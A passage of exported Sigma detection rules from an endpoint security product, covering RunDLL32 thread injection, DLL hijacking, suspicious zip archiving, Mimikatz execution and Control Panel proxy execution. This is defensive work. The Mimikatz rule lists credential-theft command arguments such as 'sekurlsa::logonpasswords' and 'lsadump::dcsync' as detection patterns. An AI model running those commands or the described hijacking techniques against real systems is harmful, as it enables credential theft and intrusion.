ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_mcafee:\n ProcessOriginalFileName:\n - 'FireSvc.exe'\n - 'fcags.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_rdrleakdiag:\n ProcessOriginalFileName: 'RdrLeakDiag.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_repmgr:\n ProcessImage|endswith: '\\RepMgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Carbon Black, Inc.'\n\n exclusion_MpDlpService:\n ProcessImage|endswith: '\\MpDlpService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_bitdefender_installer:\n ProcessImage|endswith: '\\Bitdefender\\Endpoint Security\\installer\\installer.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Bitdefender SRL'\n\n exclusion_teruten:\n ProcessImage:\n - '?:\\Windows\\SysWOW64\\TDepend.exe'\n - '?:\\Windows\\SysWOW64\\TDepend64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Teruten, Inc.'\n\n exclusion_roblox:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Roblox\\Versions\\version-????????????????\\RobloxPlayerBeta.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Roblox Corporation'\n\n exclusion_fsecure:\n ProcessImage: '?:\\Program Files (x86)\\F-Secure\\Client Security\\Ultralight\\ulcore\\\\*\\fsulprothoster.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'WithSecure Oyj'\n\n exclusion_tiworker:\n ProcessImage|endswith: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba42bfa6-260e-4950-bcfc-e32a0708078d",
"rule_name": "Remote Thread Created inside RunDLL32 Process",
"rule_description": "Detects the creation of a remote thread inside RunDLL32.\nAdversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.\nRunDLL32 is a target of choice for attackers to hide their malicious activity inside a legitimate process.\nThe Cobalt Strike Framework uses this technique to try evade detection.\nIt is recommended to investigate the process performing the remote injection to ensure its legitimacy and origin, as well as to look for other suspicious actions on the host.\n",
"rule_creation_date": "2023-04-06",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba55f6d5-4886-41fb-8312-c31e6b6e4c24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602696Z",
"creation_date": "2026-03-23T11:45:34.602700Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602708Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_extrac32.yml",
"content": "title: DLL Hijacking via extrac32.exe\nid: ba55f6d5-4886-41fb-8312-c31e6b6e4c24\ndescription: |\n Detects potential Windows DLL Hijacking via extrac32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'extrac32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba55f6d5-4886-41fb-8312-c31e6b6e4c24",
"rule_name": "DLL Hijacking via extrac32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via extrac32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba7f10ac-1480-4b45-817d-16cce2cfb0a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588204Z",
"creation_date": "2026-03-23T11:45:34.588207Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588215Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.securityjoes.com/post/hide-and-seek-in-windows-closet-unmasking-the-winsxs-hijacking-hideout",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winsxs_binary.yml",
"content": "title: WinSxS Binary Loaded Suspicious DLL\nid: ba7f10ac-1480-4b45-817d-16cce2cfb0a4\ndescription: |\n Detects potential Windows DLL Hijacking using a WinSxS binary.\n DLL hijacking usually takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers discovered a vulnerability in the Windows search order when using binaries located in the WinSxS system folder.\n If a WinSxS binary is called from a current working directory containing a missing DLL, the binary will load the DLL planted by the attacker.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.securityjoes.com/post/hide-and-seek-in-windows-closet-unmasking-the-winsxs-hijacking-hideout\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/01/03\nmodified: 2025/09/01\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessImage|startswith: '?:\\Windows\\WinSxS\\'\n ProcessCommandLine|contains: '\\Windows\\WinSxS\\'\n ImageLoaded|endswith:\n - '\\ClipUp.exe'\n - '\\route.exe'\n - '\\mcbuilder.exe'\n - '\\cmd.exe'\n - '\\ipconfig.exe'\n - '\\systeminfo.exe'\n - '.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n - '\\Windows\\SysWOW64\\'\n - '\\Windows\\System32\\'\n - '\\Windows\\WinSxS\\'\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Acronis International GmbH'\n - 'Adobe Inc.'\n - 'Apple Inc.'\n - 'Avast Software s.r.o.'\n - 'AVG Technologies USA, LLC'\n - 'Bitdefender srl'\n - 'Broadcom Corporation'\n - 'Broadcom Inc'\n - 'Cybereason inc.'\n - 'Cybereason, inc'\n - 'Cylance, Inc.'\n - 'Deep Instinct LTD'\n - 'Devicelock, inc'\n - 'Digitalpersona, inc.'\n - 'Dropbox, Inc'\n - 'Dynatrace LLC'\n - 'ESET, spol. s r.o.'\n - 'F-Secure Corporation'\n - 'Fortinet Technologies (Canada) ulc'\n - 'G DATA CyberDefense AG'\n - 'Glavsoft llc.'\n - 'HarfangLab SAS'\n - 'Ivanti, Inc.'\n - 'Kaspersky Lab Jsc'\n - 'Kaspersky Lab'\n - 'McAfee Test'\n - 'Mcafee, inc.'\n - 'Mcafee, llc'\n - 'Michael Maltsev' # Windhawk\n - 'Microsoft Corporation'\n - 'Microsoft Windows Hardware Compatibility Publisher'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Musarubra us llc'\n - 'national instruments corporation'\n - 'Notepad++'\n - 'NVIDIA Corporation PE Sign v2014'\n - 'NVIDIA Corporation'\n - 'Oracle America, Inc.'\n - 'Panda Security s.l.'\n - 'Sassafras Software Inc.'\n - 'Sophos Limited'\n - 'Sophos Ltd'\n - 'Symantec Corporation'\n - 'teamviewer germany gmbh'\n - 'Trend Micro, Inc.'\n - 'Vmware, Inc.'\n - 'Withsecure oyj'\n\n exclusion_explorer:\n ProcessImage:\n - '?:\\Windows\\winsxs\\x86_microsoft-windows-explorer_*\\explorer.exe'\n - '?:\\Windows\\winsxs\\x64_microsoft-windows-explorer_*\\explorer.exe'\n\n exclusion_tiworker:\n - ProcessCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack*\\TiWorker.exe -Embedding'\n - ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack*\\TiWorker.exe -Embedding'\n\n # Werfault loads the image and some DLLs of a crashing program\n exclusion_werfault:\n ProcessOriginalFileName: 'WerFault.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains:\n - ' -u -p'\n - ' Global\\'\n\n # Runonce loads the image of the executable to launch\n exclusion_runonce:\n ProcessOriginalFileName: 'RUNONCE.EXE'\n\n exclusion_regsvr32:\n ProcessOriginalFileName: 'REGSVR32.EXE'\n\n exclusion_scripting:\n ProcessOriginalFileName:\n - 'wscript.EXE'\n - 'cscript.EXE'\n\n exclusion_antiviruses:\n ImageLoaded:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\Mp*.dll'\n - '?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Sysfer\\x64\\sysfer.dll'\n\n exclusion_other:\n ImageLoaded:\n - '?:\\Windows\\servicing\\CbsApi.dll'\n - '?:\\Windows\\servicing\\wrpintapi.dll'\n - '?:\\Windows\\CbsTemp\\\\*\\FodWU\\Metadata\\\\*.dll'\n - '?:\\Windows\\CbsTemp\\\\*\\Client.OS.rs2.amd64\\Metadata\\\\*.dll'\n - '?:\\Windows\\UUS\\amd64\\\\*.dll'\n\n exclusion_dotnet:\n ImageLoaded|startswith: '?:\\Windows\\assembly\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba7f10ac-1480-4b45-817d-16cce2cfb0a4",
"rule_name": "WinSxS Binary Loaded Suspicious DLL",
"rule_description": "Detects potential Windows DLL Hijacking using a WinSxS binary.\nDLL hijacking usually takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers discovered a vulnerability in the Windows search order when using binaries located in the WinSxS system folder.\nIf a WinSxS binary is called from a current working directory containing a missing DLL, the binary will load the DLL planted by the attacker.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-01-03",
"rule_modified_date": "2025-09-01",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba8ea44e-2cd1-4fda-9c3a-a597d5e7abf6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618548Z",
"creation_date": "2026-03-23T11:45:34.618550Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618555Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_zip_archive_creation_file.yml",
"content": "title: Archive Created via zip in a Suspicious Folder\nid: ba8ea44e-2cd1-4fda-9c3a-a597d5e7abf6\ndescription: |\n Detects the creation of an archive file using the zip utility in a folder commonly used by malicious actors.\n Adversaries may compress and/or encrypt collected data prior to exfiltration.\n It is recommended to check the processes leading to zip's execution and the content of the archive.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2024/07/22\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/zip'\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp/'\n - '/private/tmp/'\n Kind: 'create'\n\n exclusion_webex:\n ProcessParentImage: '/Users/*/Library/Application Support/WebEx Folder/*/Meeting Center.app/Contents/Helpers/webexmta.app/Contents/MacOS/webexmta'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba8ea44e-2cd1-4fda-9c3a-a597d5e7abf6",
"rule_name": "Archive Created via zip in a Suspicious Folder",
"rule_description": "Detects the creation of an archive file using the zip utility in a folder commonly used by malicious actors.\nAdversaries may compress and/or encrypt collected data prior to exfiltration.\nIt is recommended to check the processes leading to zip's execution and the content of the archive.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-03-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bab10aff-0573-459d-8f5c-5fca1a132406",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084204Z",
"creation_date": "2026-03-23T11:45:34.084206Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084210Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz",
"https://attack.mitre.org/software/S0002/"
],
"name": "t1003_launch_mimikatz.yml",
"content": "title: Mimikatz Execution\nid: bab10aff-0573-459d-8f5c-5fca1a132406\ndescription: |\n Detects common binary names and arguments associated with Mimikatz.\n Mimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\n It is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\nreferences:\n - https://github.com/gentilkiwi/mimikatz\n - https://attack.mitre.org/software/S0002/\ndate: 2021/03/03\nmodified: 2025/04/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - attack.t1550.002\n - attack.t1550.003\n - attack.defense_evasion\n - attack.t1207\n - attack.s0002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - InternalName:\n - 'mimikatz'\n - 'mimilove'\n - OriginalFileName:\n - 'mimikatz.exe'\n - 'mimilove.exe'\n selection_args:\n - CommandLine|contains:\n - 'privilege::debug'\n - 'kerberos::list'\n - 'kerberos::ptt'\n - 'kerberos::golden'\n - 'kerberos::tgt'\n - 'kerberos::purge'\n - 'sekurlsa::logonpasswords'\n - 'sekurlsa::tickets'\n - 'sekurlsa::pth'\n - 'sekurlsa::ekeys'\n - 'sekurlsa::dpapi'\n - 'sekurlsa::dpcred'\n - 'sekurlsa::minidump'\n - 'sekurlsa::wdigest'\n - 'sekurlsa::kerberos'\n - 'sekurlsa::krbtgt'\n - 'token::elevate'\n - 'lsadump::sam'\n - 'lsadump::trust'\n - 'lsadump::secrets'\n - 'lsadump::cache'\n - 'lsadump::lsa'\n - 'lsadump::dcsync'\n - 'lsadump::dcshadow'\n - 'misc::addsid'\n - 'misc::memssp'\n - 'misc::skeleton'\n\n condition: selection_binary or selection_args\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bab10aff-0573-459d-8f5c-5fca1a132406",
"rule_name": "Mimikatz Execution",
"rule_description": "Detects common binary names and arguments associated with Mimikatz.\nMimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\nIt is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\n",
"rule_creation_date": "2021-03-03",
"rule_modified_date": "2025-04-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078",
"attack.t1207",
"attack.t1550.002",
"attack.t1550.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bab5e737-6c2c-4c7b-91d5-2de4b89836fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069979Z",
"creation_date": "2026-03-23T11:45:34.069981Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069986Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md",
"https://attack.mitre.org/techniques/T1218/002/"
],
"name": "t1218_002_suspicious_control_panel_execution.yml",
"content": "title: Suspicious Process Executed via Control Panel\nid: bab5e737-6c2c-4c7b-91d5-2de4b89836fb\ndescription: |\n Detects the suspicious execution of a process by the control.exe Windows Control Panel binary, which may indicate an attempt to proxy malicious DLL execution through the Windows Control Panel.\n Control.exe is a legitimate Windows system binary that handles the execution of Control Panel items and applets. Rundll32.exe is a Windows utility that loads and executes functions from Dynamic Link Libraries (DLLs). Attackers can use control.exe to spawn rundll32.exe, effectively proxying the execution of malicious DLLs while appearing to originate from a trusted system component.\n It is recommended to investigate the command-line arguments of the rundll32.exe process to identify the specific DLL being loaded, analyze it, and review any network connections or file system modifications made at the time of execution.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md\n - https://attack.mitre.org/techniques/T1218/002/\ndate: 2021/07/16\nmodified: 2025/05/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.LOLBin.Control\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\rundll32.exe'\n GrandparentImage|endswith: '\\control.exe'\n\n exclusion_parent:\n ParentCommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Windows\\System32\\\\*'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shell32.dll,Control_RunDLL ?:\\Windows\\System32\\\\*'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Program Files (x86)\\SageThumbs\\64\\SageThumbs.dll'\n - '?:\\windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Program Files\\Microsoft Office\\Office??\\MLCFG32.CPL,'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Program Files\\Microsoft Office\\root\\Office??\\MLCFG32.CPL,'\n\n exclusion_commandline:\n CommandLine:\n - '?:\\Windows\\System32\\ComputerDefaults.exe'\n - '?:\\Windows\\System32\\SystemPropertiesComputerName.exe'\n - '?:\\windows\\SysWOW64\\SystemPropertiesComputerName.exe'\n - '?:\\Windows\\System32\\SystemPropertiesRemote.exe'\n - '?:\\windows\\system32\\rundll32.exe ?:\\windows\\system32\\\\*'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files\\\\*'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files (x86)\\\\*'\n - '?:\\windows\\SysWOW64\\rundll32.exe ?:\\windows\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\\\*'\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ?:\\windows\\SysWOW64\\shell32.dll,#44 \\\\\\\\*\\c$\\Program Files (x86)\\\\*'\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ?:\\windows\\SysWOW64\\shell32.dll,#44 ?:\\Windows\\SysWOW64\\\\*'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL modem.cpl,,Add'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\WINDOWS\\CCM\\SMSCFGRC.cpl'\n - '?:\\WINDOWS\\system32\\mmc.exe ?:\\windows\\system32\\devmgmt.msc'\n - '?:\\Windows\\System32\\rundll32.exe devmgr.dll,DeviceProperties_RunDLL *'\n - '?:\\Windows\\system32\\control.exe /name Microsoft.Language'\n - '?:\\Windows\\System32\\control.exe ?:\\windows\\system32\\\\*'\n - '?:\\windows\\explorer.exe ms-settings:display'\n - '?:\\Windows\\System32\\SndVol.exe -s'\n - '?:\\WINDOWS\\system32\\\\*.scr /p *'\n - '?:\\Windows\\system32\\ieunatt.exe specialize'\n - '?:\\WINDOWS\\system32\\WerFault.exe -u -p * -s *'\n\n exclusion_image:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\System32\\mcbuilder.exe'\n - '?:\\Windows\\System32\\notepad.exe'\n\n exclusion_schneider:\n Image: '?:\\Windows\\system32\\CN*.exe' # (CNFUTW3.EXE, CNFXIP.exe)\n ProcessSigned: 'true'\n ProcessSignature: 'Schneider Electric'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bab5e737-6c2c-4c7b-91d5-2de4b89836fb",
"rule_name": "Suspicious Process Executed via Control Panel",
"rule_description": "Detects the suspicious execution of a process by the control.exe Windows Control Panel binary, which may indicate an attempt to proxy malicious DLL execution through the Windows Control Panel.\nControl.exe is a legitimate Windows system binary that handles the execution of Control Panel items and applets. Rundll32.exe is a Windows utility that loads and executes functions from Dynamic Link Libraries (DLLs). Attackers can use control.exe to spawn rundll32.exe, effectively proxying the execution of malicious DLLs while appearing to originate from a trusted system component.\nIt is recommended to investigate the command-line arguments of the rundll32.exe process to identify the specific DLL being loaded, analyze it, and review any network connections or file system modifications made at the time of execution.\n",
"rule_creation_date": "2021-07-16",
"rule_modified_date": "2025-05-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "baca5663-583c-45f9-b5dc-ea96a22ce542",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088812Z",
"creation_date": "2026-03-23T11:45:34.088814Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088818Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hackingarticles.in/windows-persistence-accessibility-features/",
"https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/privilege-escalation/untitled-3/accessibility-features",
"https://attack.mitre.org/techniques/T1546/008/"
],
"name": "t1546_008_persistence_sticky_keys.yml",
